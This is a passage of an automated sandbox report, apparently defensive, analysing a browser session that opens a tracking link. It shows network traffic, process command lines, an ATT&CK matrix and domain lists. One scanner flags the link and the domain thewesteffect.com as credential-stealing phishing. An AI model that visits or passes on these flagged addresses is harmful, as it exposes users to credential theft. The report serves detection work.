          Source: sets.json.0.drString found in binary or memory: https://unotv.com
          Source: sets.json.0.drString found in binary or memory: https://victorymedium.com
          Source: sets.json.0.drString found in binary or memory: https://vrt.be
          Source: sets.json.0.drString found in binary or memory: https://vwo.com
          Source: sets.json.0.drString found in binary or memory: https://welt.de
          Source: sets.json.0.drString found in binary or memory: https://wieistmeineip.de
          Source: sets.json.0.drString found in binary or memory: https://wildix.com
          Source: sets.json.0.drString found in binary or memory: https://wildixin.com
          Source: sets.json.0.drString found in binary or memory: https://wingify.com
          Source: sets.json.0.drString found in binary or memory: https://wordle.at
          Source: sets.json.0.drString found in binary or memory: https://wp.pl
          Source: sets.json.0.drString found in binary or memory: https://wpext.pl
          Source: sets.json.0.drString found in binary or memory: https://www.asadcdn.com
          Source: chromecache_69.2.dr, chromecache_72.2.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css
          Source: sets.json.0.drString found in binary or memory: https://ya.ru
          Source: sets.json.0.drString found in binary or memory: https://yours.co.uk
          Source: sets.json.0.drString found in binary or memory: https://zalo.me
          Source: sets.json.0.drString found in binary or memory: https://zdrowietvn.pl
          Source: sets.json.0.drString found in binary or memory: https://zingmp3.vn
          Source: sets.json.0.drString found in binary or memory: https://zoom.com
          Source: sets.json.0.drString found in binary or memory: https://zoom.us
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49797 version: TLS 1.2
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5816_1950057894Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5816_1950057894\sets.jsonJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5816_1950057894\manifest.jsonJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5816_1950057894\LICENSEJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5816_1950057894\_metadata\Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5816_1950057894\_metadata\verified_contents.jsonJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5816_1950057894\manifest.fingerprintJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_5816_1212692244Jump to behavior
          Source: classification engineClassification label: mal80.phis.win@18/41@22/11
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2020,i,2763923009184806423,6999701321909879304,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2020,i,2763923009184806423,6999701321909879304,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          File Deletion
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d2380%Avira URL Cloudsafe
          https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://thewesteffect.com/favicon.ico0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          199.232.214.172
          truefalse
            high
            d2vgu95hoyrpkh.cloudfront.net
            13.35.58.61
            truefalse
              high
              cs837.wac.edgecastcdn.net
              192.229.133.221
              truefalse
                high
                link.mail.beehiiv.com
                104.18.68.40
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      www.google.com
                      142.250.186.164
                      truefalse
                        high
                        factiv.za.com
                        185.221.216.128
                        truefalse
                          unknown
                          thewesteffect.com
                          192.254.232.133
                          truetrue
                            unknown
                            fp2e7a.wpc.phicdn.net
                            192.229.221.95
                            truefalse
                              high
                              ljppcv.us8.list-manage.com
                              unknown
                              unknownfalse
                                unknown
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  www.w3schools.com
                                  unknown
                                  unknownfalse
                                    high
                                    cdn.socket.io
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://thewesteffect.com/favicon.icotrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://wieistmeineip.desets.json.0.drfalse
                                        high
                                        https://mercadoshops.com.cosets.json.0.drfalse
                                          high
                                          https://gliadomain.comsets.json.0.drfalse
                                            high
                                            https://poalim.xyzsets.json.0.drfalse
                                              high
                                              https://mercadolivre.comsets.json.0.drfalse
                                                high
                                                https://reshim.orgsets.json.0.drfalse
                                                  high
                                                  https://nourishingpursuits.comsets.json.0.drfalse
                                                    high
                                                    https://medonet.plsets.json.0.drfalse
                                                      high
                                                      https://unotv.comsets.json.0.drfalse
                                                        high
                                                        https://mercadoshops.com.brsets.json.0.drfalse
                                                          high
                                                          https://joyreactor.ccsets.json.0.drfalse
                                                            high
                                                            https://zdrowietvn.plsets.json.0.drfalse
                                                              high
                                                              https://johndeere.comsets.json.0.drfalse
                                                                high
                                                                https://songstats.comsets.json.0.drfalse
                                                                  high
                                                                  https://baomoi.comsets.json.0.drfalse
                                                                    high
                                                                    https://supereva.itsets.json.0.drfalse
                                                                      high
                                                                      https://elfinancierocr.comsets.json.0.drfalse
                                                                        high
                                                                        https://bolasport.comsets.json.0.drfalse
                                                                          high
                                                                          https://rws1nvtvt.comsets.json.0.drfalse
                                                                            high
                                                                            https://desimartini.comsets.json.0.drfalse
                                                                              high
                                                                              https://hearty.appsets.json.0.drfalse
                                                                                high
                                                                                https://hearty.giftsets.json.0.drfalse
                                                                                  high
                                                                                  https://mercadoshops.comsets.json.0.drfalse
                                                                                    high
                                                                                    https://heartymail.comsets.json.0.drfalse
                                                                                      high
                                                                                      https://nlc.husets.json.0.drfalse
                                                                                        high
                                                                                        https://p106.netsets.json.0.drfalse
                                                                                          high
                                                                                          https://radio2.besets.json.0.drfalse
                                                                                            high
                                                                                            https://finn.nosets.json.0.drfalse
                                                                                              high
                                                                                              https://hc1.comsets.json.0.drfalse
                                                                                                high
                                                                                                https://kompas.tvsets.json.0.drfalse
                                                                                                  high
                                                                                                  https://mystudentdashboard.comsets.json.0.drfalse
                                                                                                    high
                                                                                                    https://songshare.comsets.json.0.drfalse
                                                                                                      high
